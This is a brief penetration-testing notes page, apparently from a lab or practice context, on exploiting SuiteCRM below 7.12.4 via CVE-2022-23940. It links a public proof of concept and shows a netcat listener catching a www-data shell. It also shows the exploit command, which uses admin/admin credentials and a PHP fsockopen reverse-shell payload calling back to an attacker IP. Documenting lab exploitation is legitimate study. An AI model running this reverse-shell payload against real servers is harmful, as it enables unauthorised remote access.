SuiteCRM

Exploting SuiteCRM

Versions < 7.12.4 are vulnrable to RCE

GitHub - manuelz120/CVE-2022-23940: PoC for CVE-2022-23940GitHub

This exploit can be used to pop a rev shell 😄

└─$ nc -lnvp 22
listening on [any] 22 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.238.146] 46030
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

┌──(pikey㉿kali)-[~/exploits/CVE-2022-23940]
└─$ ./exploit.py -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.188\", 22); exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -h http://192.168.238.146/

PreviousRaspap NextTomcat

Last updated 2 years ago